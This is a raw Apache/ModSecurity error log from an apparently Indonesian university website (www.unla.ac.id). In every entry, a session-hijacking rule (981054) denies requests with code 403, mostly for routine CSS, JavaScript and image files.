[Mon Aug 28 06:46:28.050573 2023] [:error] [pid 37421] [client 165.154.118.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "203.176.176.235"] [uri "/index_sso.php"] [unique_id "ZOvgVMCo-f0AAJIt8FwAAAAW"]
[Mon Aug 28 06:51:03.679892 2023] [:error] [pid 37313] [client 103.119.55.143] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvhZ8Co-f0AAJHB33cAAAAD"]
[Mon Aug 28 06:51:03.827751 2023] [:error] [pid 37418] [client 101.128.68.106] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhZ8Co-f0AAJIqOD8AAAAT"]
[Mon Aug 28 06:51:11.237439 2023] [:error] [pid 37421] [client 114.125.228.93] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvhb8Co-f0AAJIt8nMAAAAW"]
[Mon Aug 28 06:51:11.252998 2023] [:error] [pid 37420] [client 114.125.228.93] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvhb8Co-f0AAJIsP08AAAAV"]
[Mon Aug 28 06:51:11.281209 2023] [:error] [pid 37451] [client 114.125.228.93] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvhb8Co-f0AAJJLphcAAAAA"]
[Mon Aug 28 06:51:11.284791 2023] [:error] [pid 37313] [client 114.125.228.93] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvhb8Co-f0AAJHB34cAAAAD"]
[Mon Aug 28 06:51:11.493406 2023] [:error] [pid 37451] [client 114.125.228.93] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvhb8Co-f0AAJJLphgAAAAA"]
[Mon Aug 28 06:51:25.428726 2023] [:error] [pid 37312] [client 101.128.69.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvhfcCo-f0AAJHAkB0AAAAY"]
[Mon Aug 28 06:51:30.631347 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOvhgsCo-f0AAJHB36IAAAAD"]
[Mon Aug 28 06:51:30.691692 2023] [:error] [pid 37401] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOvhgsCo-f0AAJIZRoEAAAAF"]
[Mon Aug 28 06:51:30.811930 2023] [:error] [pid 37451] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZOvhgsCo-f0AAJJLpjMAAAAA"]
[Mon Aug 28 06:51:30.821102 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOvhgsCo-f0AAJHB36QAAAAD"]
[Mon Aug 28 06:51:30.821568 2023] [:error] [pid 37401] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/nivo-slider.css"] [unique_id "ZOvhgsCo-f0AAJIZRoIAAAAF"]
[Mon Aug 28 06:51:30.822796 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/ddsmoothmenu.css"] [unique_id "ZOvhgsCo-f0AAJIfRJYAAAAN"]
[Mon Aug 28 06:51:30.861021 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery-1.4.4.min.js"] [unique_id "ZOvhgsCo-f0AAJHAkCQAAAAY"]
[Mon Aug 28 06:51:30.935519 2023] [:error] [pid 37465] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOvhgsCo-f0AAJJZZk0AAAAE"]
[Mon Aug 28 06:51:31.007628 2023] [:error] [pid 37401] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOvhg8Co-f0AAJIZRoMAAAAF"]
[Mon Aug 28 06:51:31.018889 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOvhg8Co-f0AAJIt8pIAAAAW"]
[Mon Aug 28 06:51:31.026460 2023] [:error] [pid 37416] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOvhg8Co-f0AAJIoaHwAAAAR"]
[Mon Aug 28 06:51:31.036743 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/AC_RunActiveContent.js"] [unique_id "ZOvhg8Co-f0AAJHAkCUAAAAY"]
[Mon Aug 28 06:51:31.046459 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOvhg8Co-f0AAJIfRJcAAAAN"]
[Mon Aug 28 06:51:31.067505 2023] [:error] [pid 37465] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOvhg8Co-f0AAJJZZk4AAAAE"]
[Mon Aug 28 06:51:31.095921 2023] [:error] [pid 37451] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.settings.js"] [unique_id "ZOvhg8Co-f0AAJJLpjQAAAAA"]
[Mon Aug 28 06:51:31.115878 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOvhg8Co-f0AAJIfRJgAAAAN"]
[Mon Aug 28 06:51:31.121334 2023] [:error] [pid 37418] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOvhg8Co-f0AAJIqOHIAAAAT"]
[Mon Aug 28 06:51:31.138429 2023] [:error] [pid 37420] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOvhg8Co-f0AAJIsP3wAAAAV"]
[Mon Aug 28 06:51:31.152090 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/slidingboxes.js"] [unique_id "ZOvhg8Co-f0AAJHAkCYAAAAY"]
[Mon Aug 28 06:51:31.181193 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOvhg8Co-f0AAJIt8pMAAAAW"]
[Mon Aug 28 06:51:31.237582 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOvhg8Co-f0AAJHB36YAAAAD"]
[Mon Aug 28 06:51:31.246743 2023] [:error] [pid 37465] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOvhg8Co-f0AAJJZZk8AAAAE"]
[Mon Aug 28 06:51:31.256259 2023] [:error] [pid 37416] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOvhg8Co-f0AAJIoaH4AAAAR"]
[Mon Aug 28 06:51:31.282828 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/css/Spinner.css"] [unique_id "ZOvhg8Co-f0AAJIfRJkAAAAN"]
[Mon Aug 28 06:51:31.300834 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/fileuploadfield.css"] [unique_id "ZOvhg8Co-f0AAJHAkCcAAAAY"]
[Mon Aug 28 06:51:31.328261 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOvhg8Co-f0AAJHB36cAAAAD"]
[Mon Aug 28 06:51:31.336235 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOvhg8Co-f0AAJIt8pQAAAAW"]
[Mon Aug 28 06:51:31.357557 2023] [:error] [pid 37420] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOvhg8Co-f0AAJIsP30AAAAV"]
[Mon Aug 28 06:51:31.371468 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOvhg8Co-f0AAJHAkCgAAAAY"]
[Mon Aug 28 06:51:31.382793 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOvhg8Co-f0AAJIfRJoAAAAN"]
[Mon Aug 28 06:51:31.387778 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOvhg8Co-f0AAJHB36gAAAAD"]
[Mon Aug 28 06:51:31.417412 2023] [:error] [pid 37465] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOvhg8Co-f0AAJJZZlAAAAAE"]
[Mon Aug 28 06:51:31.447307 2023] [:error] [pid 37416] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOvhg8Co-f0AAJIoaH8AAAAR"]
[Mon Aug 28 06:51:31.456503 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOvhg8Co-f0AAJIfRJsAAAAN"]
[Mon Aug 28 06:51:31.467342 2023] [:error] [pid 37418] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOvhg8Co-f0AAJIqOHQAAAAT"]
[Mon Aug 28 06:51:31.486397 2023] [:error] [pid 37420] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOvhg8Co-f0AAJIsP34AAAAV"]
[Mon Aug 28 06:51:31.491957 2023] [:error] [pid 37451] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOvhg8Co-f0AAJJLpjcAAAAA"]
[Mon Aug 28 06:51:31.517682 2023] [:error] [pid 37465] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOvhg8Co-f0AAJJZZlEAAAAE"]
[Mon Aug 28 06:51:31.562742 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.mousewheel-3.0.4.pack.js"] [unique_id "ZOvhg8Co-f0AAJIt8pUAAAAW"]
[Mon Aug 28 06:51:31.581016 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOvhg8Co-f0AAJHAkCkAAAAY"]
[Mon Aug 28 06:51:31.592795 2023] [:error] [pid 37401] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOvhg8Co-f0AAJIZRogAAAAF"]
[Mon Aug 28 06:51:31.667056 2023] [:error] [pid 37416] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOvhg8Co-f0AAJIoaIAAAAAR"]
[Mon Aug 28 06:51:31.707033 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOvhg8Co-f0AAJIt8pYAAAAW"]
[Mon Aug 28 06:51:31.776090 2023] [:error] [pid 37416] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/menu.css"] [unique_id "ZOvhg8Co-f0AAJIoaIEAAAAR"]
[Mon Aug 28 06:51:31.813118 2023] [:error] [pid 37465] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOvhg8Co-f0AAJJZZlMAAAAE"]
[Mon Aug 28 06:51:31.837096 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark.css"] [unique_id "ZOvhg8Co-f0AAJIt8pcAAAAW"]
[Mon Aug 28 06:51:31.906925 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOvhg8Co-f0AAJIt8pgAAAAW"]
[Mon Aug 28 06:51:31.921378 2023] [:error] [pid 37451] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue.css"] [unique_id "ZOvhg8Co-f0AAJJLpjkAAAAA"]
[Mon Aug 28 06:51:32.027019 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green.css"] [unique_id "ZOvhhMCo-f0AAJIt8pkAAAAW"]
[Mon Aug 28 06:51:32.031068 2023] [:error] [pid 37416] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/Sansation_300-Sansation_700.font.js"] [unique_id "ZOvhhMCo-f0AAJIoaIMAAAAR"]
[Mon Aug 28 06:51:32.126321 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg.css"] [unique_id "ZOvhhMCo-f0AAJHAkCsAAAAY"]
[Mon Aug 28 06:51:32.128987 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style100.css"] [unique_id "ZOvhhMCo-f0AAJHB36oAAAAD"]
[Mon Aug 28 06:51:32.163677 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOvhhMCo-f0AAJIt8poAAAAW"]
